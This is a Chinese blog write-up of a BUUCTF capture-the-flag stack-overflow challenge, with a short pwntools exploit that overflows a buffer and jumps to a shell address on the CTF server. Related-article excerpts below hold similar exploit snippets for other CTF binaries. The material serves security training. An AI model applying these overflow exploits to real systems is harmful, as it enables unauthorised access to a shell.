[BUUCTF-pwn]——[第六章 CTF之PWN章]stack

最新推荐文章于 2024-09-01 23:26:39 发布

Y-peak

最新推荐文章于 2024-09-01 23:26:39 发布

阅读量840

点赞数 1

分类专栏： # BUUCTF

本文链接：https://blog.youkuaiyun.com/Y_peak/article/details/114709684

版权

BUUCTF 专栏收录该内容

89 篇文章

订阅专栏

本文介绍了一个简单的栈溢出挑战题，通过平衡栈并利用特定地址实现远程控制。使用Python编写了exploit代码，实现了向目标发送精心构造的payload。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

[BUUCTF-pwn]——[第六章 CTF之PWN章]stack

题目地址: https://buuoj.cn/challenges#[%E7%AC%AC%E5%85%AD%E7%AB%A0%20CTF%E4%B9%8BPWN%E7%AB%A0]stack

思路

一个简单的栈溢出, 注意栈平衡就好

exploit

from pwn import *
p = remote('node3.buuoj.cn',25385)
shell = 0x0000000000400537
ret = 0x000000000040054E
payload = 'a' * (0xa + 8) + p64(ret) + p64(shell)
p.sendline(payload)
p.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Y-peak

关注关注

1
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

CG-CTF Stack Overflow（pwn）

苗_的博客

02-24

796

首先先拿到ida里面看一下，找一下溢出点点进去A发现是一个大小为40的数组（0x28），但是可以接受64个字符，所以这里是第一个溢出点。下面是对s进行输入，限制是n，点开n会发现n就在A的下面。所以思路就是：我们可以通过溢出A来达到覆盖n的效果然后我们点开pwnme函数会发现system函数，搜索字符串发现没有‘/bin/sh’，所以需要我们自己写入bss段。 exp： f...

BUUCTF-PWN刷题记录-8

weixin_44145820的博客

04-16

973

目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic

参与评论您还未登录，请先登录后发表或查看评论

buuoj [第六章 CTF之PWN章]stack

yongbaoii的博客

01-20

1151

ret2text 习惯性查一下保护，啥也不是。很明显的栈溢出。很明显的shellcode 直接十八个字节再加上返回地址就有了。 exp from pwn import* r = remote('node3.buuoj.cn',27516) #r = process('./stack') context.log_level = "debug" #gdb.attach(r) system_addr = 0x400537 payload = 'a' * 18 + p64(0x40054e) + p64(

buuctf-N1Book[第六章 CTF之PWN章]

CHAWUCIREN1的博客

10-17

2410

64位，开启了NX保护 shift + F12查看里面的字符串发现自带system和bin/sh的地址 bin_sh = 0x400537 gets函数对输入的长度没有限制查看一下v1的栈空间需要填充0xA + 0x8的空间 payload = “A” *(0xA + 8) 由于存在栈对齐，所以还要加一个地址 ret = 0x40054E 构造的exp如下 from pwn import * #p = process("./stack") p = remote("node4.buuoj..

[BUUCTF-pwn] stack2,stack3,stack4,stack3-rop

weixin_52640415的博客

02-18

688

这几个题像是哪哪哪讲从入门...课的例题。题目的main函数是相同的，没有问题。 int __cdecl main(int argc, const char **argv, const char **envp) { char buf[256]; // [rsp+10h] [rbp-100h] BYREF setbuf(stdin, 0LL); setbuf(stdout, 0LL); setbuf(stderr, 0LL); puts("welcome to stack2");

BUUCTF(PWN)suctf_2018_stack

半岛铁盒的博客

04-03

320

from pwn import * p = remote('node3.buuoj.cn',29039) ret_addr = 0x0400677 payload = 'a' * (0x20 + 8) + p64(ret_addr) p.send(payload) p.interactive() 不是676的原因是这道题检查的其实是栈平衡的问题,因为是Ubuntu18,需要栈对齐 ...

BUUCTF-rip 尝试PWN入门

brightendavid的博客

05-04

1686

BUUCTF-rip 拿到的是一个什么呢，感觉是一个小系统？但是也就是一个小程序嘛。这个程序就是执行一个输入输出的命令。但是这里面存在漏洞。这个s是15byte的字符在fun部分有一个/bin/sh 这个据说是一个系统级函数，为什么说是系统级函数呢，因为有一个system吧。一般会是什么用都没有。但是在使用这样的一个payload后,就可以利用，也不知道这个pwn 库是做了什么。感觉像是变魔术。要刚好把堆栈覆盖到这个系统函数的位置？是不是这个解释呢。 #python3 需要预先安

BUUCTF PWN wp--[第五空间2019 决赛]PWN5

最新发布

2302_81740139的博客

09-01

995

在这个上下文中，%10$n表示写入的值将是printf的第10个参数，但由于p32(0x804C044)没有在printf调用中作为参数，它实际上利用了格式化字符串漏洞，将栈上的某个值写入到地址0x804C044。p32函数将32位整数转换为其小端序的字符串表示，这里转换的是地址0x804C044，这个地址应该是之前提到的全局变量dword_804C044的地址。这个变量似乎是一个全局变量，其地址是硬编码的（例如，在ELF文件中，地址可能是一个固定的地址）。如果之前的利用成功，这将提供一个shell。

CSAWCTF-2018-pwn-shellcode 题解

lifanxin的博客

11-29

1494

Write Up知识点关键字样本运行静态分析程序逻辑求解脚本一些细节：wp_shellcode.py 知识点关键字栈溢出，shellcode拆分+组装样本样本来自2018年CSAWCTF的pwn题目shellcode 运行检查文件，发现有两个可以利用的点：栈溢出保护未开启； NX保护未开启，存在RWX段。 $ checksec CSAWCTF-2018-pwn [*] '/home/fanxinli/pwnSample/CSAWCTF-2018/CSAWCTF-2018-pwn'

南京邮电大学CTF-PWN-Stack Overflow

Ceciiiilia的博客

04-13

705

终于开始学pwn了…今天第一次做出来这题，记录一下。 1、首先放到ida里查看函数情况，发现了fgets()函数 2、双击A追踪，发现A的大小为0x28（0x0804A0A8 - 0x0804A080），并且栈位置的的高位处就是n，所以可以填充0x28个'A'，来溢出到n的位置。 3、 from pwn import * #p = process('./cgpwna')#...

ctf 堆栈结构

qq_69100706的博客

08-12

490

CTF（Capture The Flag）竞赛中，理解堆栈结构对于解决涉及二进制分析、逆向工程和利用开发的挑战至关重要。堆栈是在程序执行过程中用于临时存储数据和管理函数调用的关键数据结构。

buuoj [第六章 CTF之PWN章]ROP

yongbaoii的博客

01-28

1099

ret2libc 保护。啥没有。直接就溢出了，但是没后门函数，就通过puts函数泄露puts函数地址，计算libc基地址，找到system函数与’/bin/sh’，然后一把梭就好。需要用到gadget。 exp

CG-CTF Stack Overflow

weixin_43464124的博客

05-11

857

为了上800分也是够了… 题目地址：pwn 看了几篇wp，觉得写得总是差那么一丢丢意思首先检查溢出点通过双击A可以看到，A这个数组的大小为40 但其可以接受64个字符的大小所以这是第一个溢出点然后往下看虽然明面上显示的是输入s是有限制的限制为n 但是当我们双击n的时候会发现 n就在A的下面因此我们可以通过A来溢出到n 在函数列表中我们可以看到有一个函数名字叫做pwnme 这部明...

BUUCTF-pwn[1]

ca1m4n的博客

10-04

782

小PWN手的间歇性记录 ret2text ret2text 首先checksec一下 32位只开启了栈可执行保护 ida打开查找/bin/sh binsh = 0x804863A 距离ebp的距离需要利用Ubuntu中gdb工具 gdb ./ret2text 因为存储读入的变量和到栈底的距离未知所以断点下在_gets b *0x80486AE 别忘了再按r,报错不用管借助变量s到esp的距离计算出s的地址再计算变量s到esp的距离用Python： ebp = 0xffffcfd8 e

BUUCTF-pwn(4)

njh18790816639的博客

11-16

1302

pwn2_sctf_2016 该题目还是比较简单的！并且存在int 80中断，但可惜没有/bin/sh字符串！所以还是ret2libc！ from pwn import * from LibcSearcher import * context(log_level='debug',os='linux',arch='i386') r = remote('node4.buuoj.cn',28630) #r = process('./pwn2_sctf_2016') elf = ELF('./pwn2_sc

[BUUCTF-pwn]——suctf_2018_stack

Y_peak的博客

03-11

527

[BUUCTF-pwn]——suctf_2018_stack 题目地址：https://buuoj.cn/challenges#suctf_2018_stack 什么保护都没开在IDA中一查看，发现有点简单太简单了.本来刚开始以为溢出空间不够只有两个地址,一个epb, 一个返回地址, 可是结果仅仅返回地址就可以了 exploit from pwn import * p = remote('node3.buuoj.cn',29819) leave_ret = 0x000000000040073

buuctf-pwn-inndy_rop-wp

xuaohu123的博客

01-08

373

buuctf-pwn-innd_rop 查看文件保护 32位程序，开启了nx保护。

buuctf pwn（1~4）

cainiao78777的博客

11-22

208

buuctf前四道题目的做法

buuctf-pwn write-ups (4)

CoLin的pwn小屋

06-12

556

buuctf 032-038题题解，重点关注038题 pwnable_orw